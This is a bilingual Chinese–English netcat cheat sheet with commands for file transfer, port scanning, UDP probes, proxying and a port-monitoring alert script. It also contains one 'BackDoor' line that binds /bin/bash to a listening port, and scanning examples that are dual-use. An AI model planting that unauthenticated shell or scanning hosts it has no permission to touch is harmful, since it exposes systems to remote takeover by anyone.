netcat (nc) [網絡上的利刀]

更新時間: 2018-09-21

目錄

 


安裝

 

apt-get install netcat

 


Telnet

 

# it handles binary data as regular data

nc -t 192.168.1.2

# use another source ip

nc -s <source_ip> -t <target> 25

opt:

-s, --source addr

-p, --source-port port

-C, --crlf                            # Use CRLF for EOL sequence

 


Port_Listening (Chatting)

 

nc -l -p 12345

 


Transferring File

# 公開檔案 (傳送)

$ tar -jcf - /data | nc -l -p 6666

# 提取檔案 (接收)

$ nc <對方ip> 6666 | tar -jxf

 


Port Scanning

 

$ nc -v -n -z -w 1 192.168.1.2 1-1000

-n     # prevents DNS lookup

-z     # Zero-I/O mode. In both cases, no data is transfered.

In connect mode

it means that as soon as the port is open it is immediately shutdown and closed.

In listen mode

it makes netcat refusing all the incoming connections thus running in timeout (if set), or waiting forever.

-w1   # makes the connection timeout after 1 second of inactivity

i.e.

成功

nc -z -w 1 192.168.251.42 1433

Connection to 192.168.251.42 1433 port [tcp/ms-sql-s] succeeded!

失敗

nc -z -w 1 192.168.251.42 1434

echo $?

1

UDP

 

-u      # Use UDP instead of the default option of TCP.

-v      # Have nc give more verbose output.

-w N  # sec

i.e.

nc -v  -w 1 -u 192.168.123.33 500

Connection to 192.168.123.33 500 port [udp/isakmp] succeeded!

 * 加 -v 後, 會有 3 個 udp package 發去對方.

# nc send single udp packet

echo '' | nc -u -w 1 datahunter.org 4001

 


Proxy

 

# Input (TCP Port: 1234) --> Web --> Output (TCP Port: 2345)

$ nc -l -p 1234 | nc www.google.com 80 | nc -l -p 2345

 


BackDoor

 

$ nc -l -p 12345 -e /bin/bash

 

 


Scripts

 

mon a port & e-mail alarm

chk-port.sh

#!/bin/bash

msg="IPSec_Fail - Server-X"
email="admin@domain1 admin@domain2"

# check mssql
nc -z -w 1 192.168.251.42 1433

if [ $? != 0 ];then
        echo $msg
        echo "$msg" | mail -s "$msg" $email
fi

 


 

 

 

 

 

 

Creative Commons license icon Creative Commons license icon